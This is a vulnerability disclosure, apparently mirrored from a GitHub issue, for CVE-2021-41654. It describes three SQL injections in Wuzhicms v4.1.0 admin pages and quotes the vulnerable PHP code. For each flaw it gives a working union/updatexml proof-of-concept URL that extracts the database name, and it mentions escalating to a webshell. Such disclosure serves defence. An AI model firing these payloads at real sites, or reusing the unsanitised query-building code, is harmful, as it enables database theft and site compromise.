Headline

CVE-2021-41654: There are 3 SQL injections in Wuzhicms v4.1.0 background · Issue #198 · wuzhicms/wuzhicms

SQL injection vulnerabilities exist in Wuzhicms v4.1.0 which allows attackers to execute arbitrary SQL commands via the $keyValue parameter in /coreframe/app/pay/admin/index.php

2 years ago

CVE

Open in Source

#sql #vulnerability #web #git #php

There are 3 SQL injections in Wuzhicms v4.1.0 background****one****Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:

/coreframe/app/pay/admin/index.php 30-98

public function listing(){
    $fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
    $keytype = isset($GLOBALS\['keytype'\]) ? intval($GLOBALS\['keytype'\]) : 0;
    $payments = $this\->payments;
    $status\_arr = $this\->status\_arr;
    $page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
    $page = max($page, 1);
    $status = $GLOBALS\['status'\];

    if ($status) {
        $where = 'status=' . $status;
    } else {
        $where = 'status>0';
    }
    if ($keytype) {
        $where .= " AND \`keytype\`='$keytype'";
    }
    $keyValue = strip\_tags($GLOBALS\['keyValue'\]);
    $fieldtype = intval($GLOBALS\['fieldtype'\]);
    if ($keyValue) {
        switch ($fieldtype) {
            case 0:
                $where .= " AND \`order\_no\`='$keyValue'";
                break;
            case 1:
                $where .= " AND \`telephone\`='$keyValue'";
                break;
            case 2:
                $where .= " AND \`kf\_username\`='$keyValue'";
                break;
            case 3:
                $where .= " AND \`jxs\_username\`='$keyValue'";
                break;
        }
    }

    if ($\_SESSION\['role'\] == 4) {
        //客服
        $kf\_username = get\_cookie('username');
        $where .= " AND \`kf\_username\`='$kf\_username'";
    }
    $starttime = '';
    $endtime = '';
    if ($GLOBALS\['starttime'\]) {
        $starttime = strtotime($GLOBALS\['starttime'\]);
        $where .= " AND \`addtime\`>'$starttime'";
    }
    if ($GLOBALS\['endtime'\]) {
        $endtime = strtotime($GLOBALS\['endtime'\]);
        $where .= " AND \`endtime\`<'$endtime'";
    }
    if(isset($GLOBALS\['exp'\])) {
        $pagesize = 1000;
    } else {
        $pagesize = 20;
    }

    $admin\_result = $this\->db\->get\_list('admin', array('role' => 4), '\*', 0, 20, 0);
    $result = $this\->db\->get\_list('pay', $where, '\*', 0, $pagesize, $page, 'id DESC');
    if(isset($GLOBALS\['exp'\])) {
        $this\->export\_excel($result);
    }
    $pages = $this\->db\->pages;
    $total = $this\->db\->number;
    $pay\_config = get\_config('pay\_config');
    load\_class('form');

    include $this\->template('listing');
}

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

/index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -

two

The second SQL injection and the first SQL injection are in a different function in the same file!

Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:

/coreframe/app/pay/admin/index.php 244-289

public function relay(){ $id = intval($GLOBALS[‘id’]); $r = $this->db->get_one('pay’, array(‘id’ => $id)); $r2 = $this->db->get_one('pay_detail’, array(‘id’ => $id)); $r = array_merge($r, $r2); $keyValue = '’; $keyType = '’; if (isset($GLOBALS[‘keyType’])) { $keyType = $GLOBALS[‘keyType’]; $keyValue = $GLOBALS[‘keyValue’]; if ($keyValue) { $where = "modelid=11 AND `$keyType` LIKE '%$keyValue%’"; $result = $this->db->get_list('member’, $where, '*’, 0, 20, 0, ‘uid DESC’); } } elseif (isset($GLOBALS[‘submit’])) { load_function('common’, ‘pay’); $formdata = array(); $formdata[‘order_no’] = create_order_no(); $formdata[‘to_uid’] = intval($GLOBALS[‘to_uid’]); $formdata[‘username’] = $r[‘linkman’]; $formdata[‘mobile’] = $r[‘telephone’]; $formdata[‘pinpai’] = $r[‘data1’]; $formdata[‘chexing’] = $r[‘data3’]; $formdata[‘addtime’] = $r[‘addtime’]; $formdata[‘keytype’] = 0;//游客订单 $formdata[‘zftime’] = SYS_TIME; $this->db->insert('demand_relay’, $formdata); $formdata2 = array(); $formdata2[‘op_uid’] = $_SESSION[‘uid’]; $formdata2[‘to_uid’] = intval($GLOBALS[‘to_uid’]); $formdata2[‘to_username’] = $GLOBALS[‘to_username’]; $formdata2[‘updatetime’] = SYS_TIME; $this->db->insert('demand_history’, $formdata2); // $this->db->update('demand’, array('flag’=>1),array(‘did’ => $did)); $this->db->update('pay’, array(‘jxs_username’ => $formdata2[‘to_username’]), array(‘id’ => $id)); $forward = strip_tags($GLOBALS[‘forward’]); MSG('发送成功’, $forward); } else { $uid = $_SESSION[‘uid’]; $where = "op_uid=’$uid’"; $data = $this->db->get_one('demand_history’, $where, '*’, 0, ‘hid DESC’); $forward = strip_tags($GLOBALS[‘forward’]);

    }
    include $this\->template('pay\_relay');
}

Set $keyType=uid and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

/index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -

three****Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability

Someone has submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php before (#175), but I found that in addition to the $flag parameter, it can be injected In addition, the $keyValue parameter can also be injected!

Vulnerability file:

coreframe/app/order/admin/index.php 22-87

public function listing() { load_class(‘form’); $fieldtypes = array(‘订单ID’,’标题’,’下单会员’,’物流单号’); $flag = $GLOBALS[‘flag’]; $status = array(); $status[1] = '待发货’; $status[2] = '已发货’; $status[3] = '订单完成’;

$status\_arr = $this\->status\_arr;
$page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
$page = max($page,1);
$keyValue = strip\_tags($GLOBALS\['keyValue'\]);
$fieldtype = intval($GLOBALS\['fieldtype'\]);
$where = '1';
if($keyValue) {
    switch($fieldtype) {
        case 0:
            $where .= " AND \`order\_no\`='$keyValue'";
            break;
        case 1:
            $where .= " AND \`remark\` LIKE '%$keyValue%'";
            break;
        case 2:
            $r = $this\->db\->get\_one('member', array('username' => $keyValue));
            $uid = $r\['uid'\];
            $where .= " AND \`uid\`='$uid'";
            break;
        case 3:
            $where .= " AND \`snid\`='$keyValue'";
            break;
    }
}
if($flag!='' && $flag\==0 || $flag) $where .=" AND \`status\`='$flag'";
$starttime = '';
$endtime = '';
if($GLOBALS\['starttime'\]) {
    $starttime = strtotime($GLOBALS\['starttime'\]);
    $where .= " AND \`addtime\`>'$starttime'";
}
if($GLOBALS\['endtime'\]) {
    $endtime = strtotime($GLOBALS\['endtime'\]);
    $where .= " AND \`addtime\`<'$endtime'";
}
$result\_arr = $this\->db\->get\_list('order\_point', $where, '\*', 0, 20,$page,'orderid DESC');

Set $fieldtype=1 and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1


Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file.


https://github.com/wuzhicms/wuzhicms/issues/198



Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198)

Use sql injection to elevate permissions and write webshell
Individual

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago